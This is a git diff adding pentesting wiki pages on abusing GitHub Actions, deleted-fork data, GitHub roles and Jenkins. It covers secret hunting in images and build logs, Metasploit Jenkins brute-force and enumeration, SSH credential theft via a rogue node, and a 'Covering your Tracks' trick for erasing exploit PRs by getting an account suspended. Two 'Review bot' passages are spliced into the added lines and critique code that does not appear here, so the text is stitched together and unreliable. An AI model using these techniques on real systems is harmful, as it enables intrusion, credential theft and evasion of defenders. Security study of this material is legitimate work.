+ +Github Action Build & Push Docker Image + +```yaml +[...] + +- name: Set up Docker Buildx + uses: docker/setup-buildx-action@v1 + +- name: Login to GitHub Container Registry + uses: docker/login-action@v1 + with: + registry: ghcr.io + username: ${{ github.repository_owner }} + password: ${{ secrets.ACTIONS_TOKEN }} + +- name: Add Github Token to Dockerfile to be able to download code + run: | + sed -i -e 's/TOKEN=##VALUE##/TOKEN=${{ secrets.ACTIONS_TOKEN }}/g' Dockerfile + +- name: Build and push + uses: docker/build-push-action@v2 + with: + context: . + push: true + tags: | + ghcr.io/${{ github.repository_owner }}/${{ github.event.repository.name }}:latest + ghcr.io/${{ github.repository_owner }}/${{ github.event.repository.name }}:${{ env.GITHUB_NEWXREF }}-${{ github.sha }} + +[...] +``` + +
+ +As you could see in the previous code, the Github registry is hosted in **`ghcr.io`**. + +A user with read permissions over the repo will then be able to download the Docker Image using a personal access token: + +```bash +echo $gh_token | docker login ghcr.io -u --password-stdin +docker pull ghcr.io//: +``` + +Then, the user could search for **leaked secrets in the Docker image layers:** + +{% embed url="https://book.hacktricks.xyz/generic-methodologies-and-resources/basic-forensic-methodology/docker-forensics" %} + +### Sensitive info in Github Actions logs + +Even if **Github** try to **detect secret values** in the actions logs and **avoid showing** them, **other sensitive data** that could have been generated in the execution of the action won't be hidden. For example a JWT signed with a secret value won't be hidden unless it's [specifically configured](https://github.com/actions/toolkit/tree/main/packages/core#setting-a-secret). + +## Covering your Tracks + +(Technique from [**here**](https://divyanshu-mehta.gitbook.io/researchs/hijacking-cloud-ci-cd-systems-for-fun-and-profit)) First of all, any PR raised is clearly visible to the public in Github and to the target GitHub account. In GitHub by default, we **can’t delete a PR of the internet**, but there is a twist. For Github accounts that are **suspended** by Github, all of their **PRs are automatically deleted** and removed from the internet. So in order to hide your activity you need to either get your **GitHub account suspended or get your account flagged**. This would **hide all your activities** on GitHub from the internet (basically remove all your exploit PR) + +An organization in GitHub is very proactive in reporting accounts to GitHub. All you need to do is share “some stuff” in Issue and they will make sure your account is suspended in 12 hours :p and there you have, made your exploit invisible on github. 
+ +{% hint style="warning" %} +The only way for an organization to figure out they have been targeted is to check GitHub logs from SIEM since from GitHub UI the PR would be removed. +{% endhint %} + +## Tools + +The following tools are useful to find Github Action workflows and even find vulnerable ones: + +* [https://github.com/CycodeLabs/raven](https://github.com/CycodeLabs/raven) +* [https://github.com/praetorian-inc/gato](https://github.com/praetorian-inc/gato) +* [https://github.com/AdnaneKhan/Gato-X](https://github.com/AdnaneKhan/Gato-X) +* [https://github.com/carlospolop/PurplePanda](https://github.com/carlospolop/PurplePanda) + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-artifact-poisoning.md b/pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-artifact-poisoning.md new file mode 100644 index 0000000000..6735c7d657 --- /dev/null +++ b/pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-artifact-poisoning.md @@ -0,0 +1,2 @@ +# Gh Actions - Artifact Poisoning + diff --git a/pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-cache-poisoning.md b/pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-cache-poisoning.md new file mode 100644 index 0000000000..ad5539e7c1 --- /dev/null +++ b/pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-cache-poisoning.md @@ -0,0 +1,2 @@ +# GH Actions - Cache Poisoning + diff --git a/pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-context-script-injections.md b/pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-context-script-injections.md new file mode 100644 index 0000000000..89d6cff73c --- /dev/null +++ b/pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-context-script-injections.md @@ -0,0 +1,2 @@ +# Gh Actions - Context Script Injections + diff --git a/pentesting-ci-cd/github-security/accessible-deleted-data-in-github.md b/pentesting-ci-cd/github-security/accessible-deleted-data-in-github.md new file mode 100644 index 0000000000..3923868662 --- /dev/null +++ b/pentesting-ci-cd/github-security/accessible-deleted-data-in-github.md @@ -0,0 +1,85 @@ +# Accessible Deleted Data in Github + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
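Review bot: the "Example of vulnerable workflow" under `dawidd6/action-download-artifact` is not valid workflow YAML: the `with:` block carrying `name: artifact` and `path: ./script.py` hangs off the `- run: python ./script.py` step, where `with` is not allowed, and belongs under the `uses: dawidd6/action-download-artifact` step (which also needs a version ref); in the attacking workflow `- uses actions/upload-artifact@v2` is missing the colon after `uses`. Since the point of the example is that an unset `path` lets the artifact overwrite `./script.py` in the working directory, the download step should show only `name: artifact` with no `path`, and the next step should run the overwritten file. Smaller issues in the same hunk: `secrets.POSTGRESS_PASSWORDyaml` in both the `list_env` and `revshell` examples looks like a stray suffix on `POSTGRESS_PASSWORD`; the gcore one-liner `ps ax | grep 'Runner.Listener' | head -n 1` can return the PID of the grep itself, because its own command line contains the pattern, so use `pgrep -f Runner.Listener` or `grep '[R]unner.Listener'`; the `workflow_call` section is still two TODO lines; the `docker pull ghcr.io//:` line has lost its owner/repo/tag placeholders (if they were written as angle-bracketed tokens they need escaping to render); and the three content-refs (gh-actions-context-script-injections.md, gh-actions-cache-poisoning.md, gh-actions-artifact-poisoning.md) point at pages that this same patch adds with nothing but a title line.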
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +This ways to access data from Github that was supposedly deleted was [**reported in this blog post**](https://trufflesecurity.com/blog/anyone-can-access-deleted-and-private-repo-data-github). + +## Accessing Deleted Fork Data + +1. You fork a public repository +2. You commit code to your fork +3. You delete your fork + +{% hint style="danger" %} +The data commited in the deleted fork is still accessible. +{% endhint %} + +## Accessing Deleted Repo Data + +1. You have a public repo on GitHub. +2. A user forks your repo. +3. You commit data after they fork it (and they never sync their fork with your updates). +4. You delete the entire repo. + +{% hint style="danger" %} +Even if you deleted your repo, all the changes made to it are still accessible through the forks. +{% endhint %} + +## Accessing Private Repo Data + +1. You create a private repo that will eventually be made public. +2. You create a private, internal version of that repo (via forking) and commit additional code for features that you’re not going to make public. +3. You make your “upstream” repository public and keep your fork private. + +{% hint style="danger" %} +It's possible to access al the data pushed to the internal fork in the time between the internal fork was created and the public version was made public. 
+{% endhint %} + +## How to discover commits from deleted/hidden forks + +The same blog post propose 2 options: + +### Directly accessing the commit + +If the commit ID (sha-1) value is known it's possible to access it in `https://github.com///commit/` + +### Brute-forcing short SHA-1 values + +It's the same to access both of these: + +* [https://github.com/HackTricks-wiki/hacktricks/commit/8cf94635c266ca5618a9f4da65ea92c04bee9a14](https://github.com/HackTricks-wiki/hacktricks/commit/8cf94635c266ca5618a9f4da65ea92c04bee9a14) +* [https://github.com/HackTricks-wiki/hacktricks/commit/8cf9463](https://github.com/HackTricks-wiki/hacktricks/commit/8cf9463) + +And the latest one use a short sha-1 that is bruteforceable. + +## References + +* [https://trufflesecurity.com/blog/anyone-can-access-deleted-and-private-repo-data-github](https://trufflesecurity.com/blog/anyone-can-access-deleted-and-private-repo-data-github) + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-ci-cd/github-security/basic-github-information.md b/pentesting-ci-cd/github-security/basic-github-information.md new file mode 100644 index 0000000000..a4cabaef37 --- /dev/null +++ b/pentesting-ci-cd/github-security/basic-github-information.md @@ -0,0 +1,286 @@ +# Basic Github Information + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
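Review bot: in "Directly accessing the commit" the URL pattern renders as `https://github.com///commit/`, so the owner, repository and commit-id placeholders have been dropped (angle-bracketed tokens need escaping in GitBook) and the reader cannot see that the path is owner/repo/commit/sha. In "Brute-forcing short SHA-1 values" the two example links use a 7-hex-character prefix, which is 16^7 (about 268 million) candidates; the brute-force claim only holds if GitHub resolves shorter prefixes (git's own minimum abbreviation is 4 hex digits), so state the minimum prefix length relied on and the request count it implies. Minor wording: "This ways to access data", "commited", "al the data", and "It's the same to access both of these" should read "Both of these URLs resolve to the same commit".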
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## Basic Structure + +The basic github environment structure of a big **company** is to own an **enterprise** which owns **several organizations** and each of them may contain **several repositories** and **several teams.**. Smaller companies may just **own one organization and no enterprises**. + +From a user point of view a **user** can be a **member** of **different enterprises and organizations**. Within them the user may have **different enterprise, organization and repository roles**. + +Moreover, a user may be **part of different teams** with different enterprise, organization or repository roles. + +And finally **repositories may have special protection mechanisms**. + +## Privileges + +### Enterprise Roles + +* **Enterprise owner**: People with this role can **manage administrators, manage organizations within the enterprise, manage enterprise settings, enforce policy across organizations**. However, they **cannot access organization settings or content** unless they are made an organization owner or given direct access to an organization-owned repository +* **Enterprise members**: Members of organizations owned by your enterprise are also **automatically members of the enterprise**. + +### Organization Roles + +In an organisation users can have different roles: + +* **Organization owners**: Organization owners have **complete administrative access to your organization**. This role should be limited, but to no less than two people, in your organization. +* **Organization members**: The **default**, non-administrative role for **people in an organization** is the organization member. By default, organization members **have a number of permissions**. +* **Billing managers**: Billing managers are users who can **manage the billing settings for your organization**, such as payment information. +* **Security Managers**: It's a role that organization owners can assign to any team in an organization. 
When applied, it gives every member of the team permissions to **manage security alerts and settings across your organization, as well as read permissions for all repositories** in the organization. + * If your organization has a security team, you can use the security manager role to give members of the team the least access they need to the organization. +* **Github App managers**: To allow additional users to **manage GitHub Apps owned by an organization**, an owner can grant them GitHub App manager permissions. +* **Outside collaborators**: An outside collaborator is a person who has **access to one or more organization repositories but is not explicitly a member** of the organization. + +You can **compare the permissions** of these roles in this table: [https://docs.github.com/en/organizations/managing-peoples-access-to-your-organization-with-roles/roles-in-an-organization#permissions-for-organization-roles](https://docs.github.com/en/organizations/managing-peoples-access-to-your-organization-with-roles/roles-in-an-organization#permissions-for-organization-roles) + +### Members Privileges + +In _https://github.com/organizations/\/settings/member\_privileges_ you can see the **permissions users will have just for being part of the organisation**. + +The settings here configured will indicate the following permissions of members of the organisation: + +* Be admin, writer, reader or no permission over all the organisation repos. +* If members can create private, internal or public repositories. 
+* If forking of repositories is possible +* If it's possible to invite outside collaborators +* If public or private sites can be published +* The permissions admins has over the repositories +* If members can create new teams + +### Repository Roles + +By default repository roles are created: + +* **Read**: Recommended for **non-code contributors** who want to view or discuss your project +* **Triage**: Recommended for **contributors who need to proactively manage issues and pull requests** without write access +* **Write**: Recommended for contributors who **actively push to your project** +* **Maintain**: Recommended for **project managers who need to manage the repository** without access to sensitive or destructive actions +* **Admin**: Recommended for people who need **full access to the project**, including sensitive and destructive actions like managing security or deleting a repository + +You can **compare the permissions** of each role in this table [https://docs.github.com/en/organizations/managing-access-to-your-organizations-repositories/repository-roles-for-an-organization#permissions-for-each-role](https://docs.github.com/en/organizations/managing-access-to-your-organizations-repositories/repository-roles-for-an-organization#permissions-for-each-role) + +You can also **create your own roles** in _https://github.com/organizations/\/settings/roles_ + +### Teams + +You can **list the teams created in an organization** in _https://github.com/orgs/\/teams_. Note that to see the teams which are children of other teams you need to access each parent team. + +### Users + +The users of an organization can be **listed** in _https://github.com/orgs/\/people._ + +In the information of each user you can see the **teams the user is member of**, and the **repos the user has access to**. + +## Github Authentication + +Github offers different ways to authenticate to your account and perform actions on your behalf. 
+ +### Web Access + +Accessing **github.com** you can login using your **username and password** (and a **2FA potentially**). + +### **SSH Keys** + +You can configure your account with one or several public keys allowing the related **private key to perform actions on your behalf.** [https://github.com/settings/keys](https://github.com/settings/keys) + +#### **GPG Keys** + +You **cannot impersonate the user with these keys** but if you don't use it it might be possible that you **get discover for sending commits without a signature**. Learn more about [vigilant mode here](https://docs.github.com/en/authentication/managing-commit-signature-verification/displaying-verification-statuses-for-all-of-your-commits#about-vigilant-mode). + +### **Personal Access Tokens** + +You can generate personal access token to **give an application access to your account**. When creating a personal access token the **user** needs to **specify** the **permissions** to **token** will have. [https://github.com/settings/tokens](https://github.com/settings/tokens) + +### Oauth Applications + +Oauth applications may ask you for permissions **to access part of your github information or to impersonate you** to perform some actions. A common example of this functionality is the **login with github button** you might find in some platforms. 
+ +* You can **create** your own **Oauth applications** in [https://github.com/settings/developers](https://github.com/settings/developers) +* You can see all the **Oauth applications that has access to your account** in [https://github.com/settings/applications](https://github.com/settings/applications) +* You can see the **scopes that Oauth Apps can ask for** in [https://docs.github.com/en/developers/apps/building-oauth-apps/scopes-for-oauth-apps](https://docs.github.com/en/developers/apps/building-oauth-apps/scopes-for-oauth-apps) +* You can see third party access of applications in an **organization** in _https://github.com/organizations/\/settings/oauth\_application\_policy_ + +Some **security recommendations**: + +* An **OAuth App** should always **act as the authenticated GitHub user across all of GitHub** (for example, when providing user notifications) and with access only to the specified scopes.. +* An OAuth App can be used as an identity provider by enabling a "Login with GitHub" for the authenticated user. +* **Don't** build an **OAuth App** if you want your application to act on a **single repository**. With the `repo` OAuth scope, OAuth Apps can **act on \_all**\_\*\* of the authenticated user's repositorie\*\*s. +* **Don't** build an OAuth App to act as an application for your **team or company**. OAuth Apps authenticate as a **single user**, so if one person creates an OAuth App for a company to use, and then they leave the company, no one else will have access to it. +* **More** in [here](https://docs.github.com/en/developers/apps/getting-started-with-apps/about-apps#about-oauth-apps). + +### Github Applications + +Github applications can ask for permissions to **access your github information or impersonate you** to perform specific actions over specific resources. In Github Apps you need to specify the repositories the app will have access to. 
+ +* To install a GitHub App, you must be an **organisation owner or have admin permissions** in a repository. +* The GitHub App should **connect to a personal account or an organisation**. +* You can create your own Github application in [https://github.com/settings/apps](https://github.com/settings/apps) +* You can see all the **Github applications that has access to your account** in [https://github.com/settings/apps/authorizations](https://github.com/settings/apps/authorizations) +* These are the **API Endpoints for Github Applications** [https://docs.github.com/en/rest/overview/endpoints-available-for-github-app](https://docs.github.com/en/rest/overview/endpoints-available-for-github-apps). Depending on the permissions of the App it will be able to access some of them +* You can see installed apps in an **organization** in _https://github.com/organizations/\/settings/installations_ + +Some security recommendations: + +* A GitHub App should **take actions independent of a user** (unless the app is using a [user-to-server](https://docs.github.com/en/apps/building-github-apps/identifying-and-authorizing-users-for-github-apps#user-to-server-requests) token). To keep user-to-server access tokens more secure, you can use access tokens that will expire after 8 hours, and a refresh token that can be exchanged for a new access token. For more information, see "[Refreshing user-to-server access tokens](https://docs.github.com/en/apps/building-github-apps/refreshing-user-to-server-access-tokens)." +* Make sure the GitHub App integrates with **specific repositories**. +* The GitHub App should **connect to a personal account or an organisation**. +* Don't expect the GitHub App to know and do everything a user can. +* **Don't use a GitHub App if you just need a "Login with GitHub" service**. 
But a GitHub App can use a [user identification flow](https://docs.github.com/en/apps/building-github-apps/identifying-and-authorizing-users-for-github-apps) to log users in _and_ do other things. +* Don't build a GitHub App if you _only_ want to act as a GitHub user and do everything that user can do. +* If you are using your app with GitHub Actions and want to modify workflow files, you must authenticate on behalf of the user with an OAuth token that includes the `workflow` scope. The user must have admin or write permission to the repository that contains the workflow file. For more information, see "[Understanding scopes for OAuth apps](https://docs.github.com/en/apps/building-oauth-apps/understanding-scopes-for-oauth-apps/#available-scopes)." +* **More** in [here](https://docs.github.com/en/developers/apps/getting-started-with-apps/about-apps#about-github-apps). + +### Github Actions + +This **isn't a way to authenticate in github**, but a **malicious** Github Action could get **unauthorised access to github** and **depending** on the **privileges** given to the Action several **different attacks** could be done. See below for more information. + +## Git Actions + +Git actions allows to automate the **execution of code when an event happen**. Usually the code executed is **somehow related to the code of the repository** (maybe build a docker container or check that the PR doesn't contain secrets). + +### Configuration + +In _https://github.com/organizations/\/settings/actions_ it's possible to check the **configuration of the github actions** for the organization. + +It's possible to disallow the use of github actions completely, **allow all github actions**, or just allow certain actions. + +It's also possible to configure **who needs approval to run a Github Action** and the **permissions of the GITHUB\_TOKEN** of a Github Action when it's run. 
+ +### Git Secrets + +Github Action usually need some kind of secrets to interact with github or third party applications. To **avoid putting them in clear-text** in the repo, github allow to put them as **Secrets**. + +These secrets can be configured **for the repo or for all the organization**. Then, in order for the **Action to be able to access the secret** you need to declare it like: + +```yaml +steps: + - name: Hello world action + with: # Set the secret as an input + super_secret: ${{ secrets.SuperSecret }} + env: # Or as an environment variable + super_secret: ${{ secrets.SuperSecret }} +``` + +#### Example using Bash + +```yaml +steps: + - shell: bash + env: + SUPER_SECRET: ${{ secrets.SuperSecret }} + run: | + example-command "$SUPER_SECRET" +``` + +{% hint style="warning" %} +Secrets **can only be accessed from the Github Actions** that have them declared. + +Once configured in the repo or the organizations **users of github won't be able to access them again**, they just will be able to **change them**. +{% endhint %} + +Therefore, the **only way to steal github secrets is to be able to access the machine that is executing the Github Action** (in that scenario you will be able to access only the secrets declared for the Action). + +### Git Environments + +Github allows to create **environments** where you can save **secrets**. Then, you can give the github action access to the secrets inside the environment with something like: + +```yaml +jobs: + deployment: + runs-on: ubuntu-latest + environment: env_name +``` + +You can configure an environment to be **accessed** by **all branches** (default), **only protected** branches or **specify** which branches can access it.\ +It can also set a **number of required reviews** before **executing** an **action** using an **environment** or **wait** some **time** before allowing deployments to proceed. 
+ +### Git Action Runner + +A Github Action can be **executed inside the github environment** or can be executed in a **third party infrastructure** configured by the user. + +Several organizations will allow to run Github Actions in a **third party infrastructure** as it use to be **cheaper**. + +You can **list the self-hosted runners** of an organization in _https://github.com/organizations/\/settings/actions/runners_ + +The way to find which **Github Actions are being executed in non-github infrastructure** is to search for `runs-on: self-hosted` in the Github Action configuration yaml. + +It's **not possible to run a Github Action of an organization inside a self hosted box** of a different organization because **a unique token is generated for the Runner** when configuring it to know where the runner belongs. + +If the custom **Github Runner is configured in a machine inside AWS or GCP** for example, the Action **could have access to the metadata endpoint** and **steal the token of the service account** the machine is running with. + +### Git Action Compromise + +If all actions (or a malicious action) are allowed a user could use a **Github action** that is **malicious** and will **compromise** the **container** where it's being executed. + +{% hint style="danger" %} +A **malicious Github Action** run could be **abused** by the attacker to: + +* **Steal all the secrets** the Action has access to +* **Move laterally** if the Action is executed inside a **third party infrastructure** where the SA token used to run the machine can be accessed (probably via the metadata service) +* **Abuse the token** used by the **workflow** to **steal the code of the repo** where the Action is executed or **even modify it**. +{% endhint %} + +## Branch Protections + +Branch protections are designed to **not give complete control of a repository** to the users. The goal is to **put several protection methods before being able to write code inside some branch**. 
+ +The **branch protections of a repository** can be found in _https://github.com/\/\/settings/branches_ + +{% hint style="info" %} +It's **not possible to set a branch protection at organization level**. So all of them must be declared on each repo. +{% endhint %} + +Different protections can be applied to a branch (like to master): + +* You can **require a PR before merging** (so you cannot directly merge code over the branch). If this is select different other protections can be in place: + * **Require a number of approvals**. It's very common to require 1 or 2 more people to approve your PR so a single user isn't capable of merge code directly. + * **Dismiss approvals when new commits are pushed**. If not, a user may approve legit code and then the user could add malicious code and merge it. + * **Require reviews from Code Owners**. At least 1 code owner of the repo needs to approve the PR (so "random" users cannot approve it) + * **Restrict who can dismiss pull request reviews.** You can specify people or teams allowed to dismiss pull request reviews. + * **Allow specified actors to bypass pull request requirements**. These users will be able to bypass previous restrictions. +* **Require status checks to pass before merging.** Some checks needs to pass before being able to merge the commit (like a github action checking there isn't any cleartext secret). +* **Require conversation resolution before merging**. All comments on the code needs to be resolved before the PR can be merged. +* **Require signed commits**. The commits need to be signed. +* **Require linear history.** Prevent merge commits from being pushed to matching branches. +* **Include administrators**. If this isn't set, admins can bypass the restrictions. +* **Restrict who can push to matching branches**. Restrict who can send a PR. 
+ +{% hint style="info" %} +As you can see, even if you managed to obtain some credentials of a user, **repos might be protected avoiding you to pushing code to master** for example to compromise the CI/CD pipeline. +{% endhint %} + +## References + +* [https://docs.github.com/en/organizations/managing-access-to-your-organizations-repositories/repository-roles-for-an-organization](https://docs.github.com/en/organizations/managing-access-to-your-organizations-repositories/repository-roles-for-an-organization) +* [https://docs.github.com/en/enterprise-server@3.3/admin/user-management/managing-users-in-your-enterprise/roles-in-an-enterprise](https://docs.github.com/en/enterprise-server@3.3/admin/user-management/managing-users-in-your-enterprise/roles-in-an-enterprise)[https://docs.github.com/en/enterprise-server](https://docs.github.com/en/enterprise-server@3.3/admin/user-management/managing-users-in-your-enterprise/roles-in-an-enterprise) +* [https://docs.github.com/en/get-started/learning-about-github/access-permissions-on-github](https://docs.github.com/en/get-started/learning-about-github/access-permissions-on-github) +* [https://docs.github.com/en/account-and-profile/setting-up-and-managing-your-github-user-account/managing-user-account-settings/permission-levels-for-user-owned-project-boards](https://docs.github.com/en/account-and-profile/setting-up-and-managing-your-github-user-account/managing-user-account-settings/permission-levels-for-user-owned-project-boards) +* [https://docs.github.com/en/actions/security-guides/encrypted-secrets](https://docs.github.com/en/actions/security-guides/encrypted-secrets) + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-ci-cd/jenkins-security/README.md b/pentesting-ci-cd/jenkins-security/README.md new file mode 100644 index 0000000000..e15154aabb --- /dev/null +++ b/pentesting-ci-cd/jenkins-security/README.md @@ -0,0 +1,439 @@ +# Jenkins Security + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## Basic Information + +Jenkins is a tool that offers a straightforward method for establishing a **continuous integration** or **continuous delivery** (CI/CD) environment for almost **any** combination of **programming languages** and source code repositories using pipelines. Furthermore, it automates various routine development tasks. While Jenkins doesn't eliminate the **need to create scripts for individual steps**, it does provide a faster and more robust way to integrate the entire sequence of build, test, and deployment tools than one can easily construct manually. + +{% content-ref url="basic-jenkins-information.md" %} +[basic-jenkins-information.md](basic-jenkins-information.md) +{% endcontent-ref %} + +## Unauthenticated Enumeration + +In order to search for interesting Jenkins pages without authentication like (_/people_ or _/asynchPeople_, this lists the current users) you can use: + +``` +msf> use auxiliary/scanner/http/jenkins_enum +``` + +Check if you can execute commands without needing authentication: + +``` +msf> use auxiliary/scanner/http/jenkins_command +``` + +Without credentials you can look inside _**/asynchPeople/**_ path or _**/securityRealm/user/admin/search/index?q=**_ for **usernames**. + +You may be able to get the Jenkins version from the path _**/oops**_ or _**/error**_ + +![](<../../.gitbook/assets/image (146).png>) + +### Known Vulnerabilities + +{% embed url="https://github.com/gquere/pwn_jenkins" %} + +## Login + +In the basic information you can check **all the ways to login inside Jenkins**: + +{% content-ref url="basic-jenkins-information.md" %} +[basic-jenkins-information.md](basic-jenkins-information.md) +{% endcontent-ref %} + +### Register + +You will be able to find Jenkins instances that **allow you to create an account and login inside of it. 
As simple as that.** + +### **SSO Login** + +Also if **SSO** **functionality**/**plugins** were present then you should attempt to **log-in** to the application using a test account (i.e., a test **Github/Bitbucket account**). Trick from [**here**](https://emtunc.org/blog/01/2018/research-misconfigured-jenkins-servers/). + +### Bruteforce + +**Jenkins** lacks **password policy** and **username brute-force mitigation**. It's essential to **brute-force** users since **weak passwords** or **usernames as passwords** may be in use, even **reversed usernames as passwords**. + +``` +msf> use auxiliary/scanner/http/jenkins_login +``` + +### Password spraying + +Use [this python script](https://github.com/gquere/pwn_jenkins/blob/master/password_spraying/jenkins_password_spraying.py) or [this powershell script](https://github.com/chryzsh/JenkinsPasswordSpray). + +### IP Whitelisting Bypass + +Many organizations combine **SaaS-based source control management (SCM) systems** such as GitHub or GitLab with an **internal, self-hosted CI** solution like Jenkins or TeamCity. This setup allows CI systems to **receive webhook events from SaaS source control vendors**, primarily for triggering pipeline jobs. + +To achieve this, organizations **whitelist** the **IP ranges** of the **SCM platforms**, permitting them to access the **internal CI system** via **webhooks**. However, it's important to note that **anyone** can create an **account** on GitHub or GitLab and configure it to **trigger a webhook**, potentially sending requests to the **internal CI system**. + +Check: [https://www.paloaltonetworks.com/blog/prisma-cloud/repository-webhook-abuse-access-ci-cd-systems-at-scale/](https://www.paloaltonetworks.com/blog/prisma-cloud/repository-webhook-abuse-access-ci-cd-systems-at-scale/) + +## Internal Jenkins Abuses + +In these scenarios we are going to suppose you have a valid account to access Jenkins. 
+ +{% hint style="warning" %} +Depending on the **Authorization** mechanism configured in Jenkins and the permission of the compromised user you **might be able or not to perform the following attacks.** +{% endhint %} + +For more information check the basic information: + +{% content-ref url="basic-jenkins-information.md" %} +[basic-jenkins-information.md](basic-jenkins-information.md) +{% endcontent-ref %} + +### Listing users + +If you have accessed Jenkins you can list other registered users in [http://127.0.0.1:8080/asynchPeople/](http://127.0.0.1:8080/asynchPeople/) + +### Dumping builds to find cleartext secrets + +Use [this script](https://github.com/gquere/pwn_jenkins/blob/master/dump_builds/jenkins_dump_builds.py) to dump build console outputs and build environment variables to hopefully find cleartext secrets. + +```bash +python3 jenkins_dump_builds.py -u alice -p alice http://127.0.0.1:8080/ -o build_dumps +cd build_dumps +gitleaks detect --no-git -v +``` + +### **Stealing SSH Credentials** + +If the compromised user has **enough privileges to create/modify a new Jenkins node** and SSH credentials are already stored to access other nodes, he could **steal those credentials** by creating/modifying a node and **setting a host that will record the credentials** without verifying the host key: + +![](<../../.gitbook/assets/image (218).png>) + +You will usually find Jenkins ssh credentials in a **global provider** (`/credentials/`), so you can also dump them as you would dump any other secret. More information in the [**Dumping secrets section**](./#dumping-secrets). + +### **RCE in Jenkins** + +Getting a **shell in the Jenkins server** gives the attacker the opportunity to leak all the **secrets** and **env variables** and to **exploit other machines** located in the same network or even **gather cloud credentials**. + +By default, Jenkins will **run as SYSTEM**. So, compromising it will give the attacker **SYSTEM privileges**. 
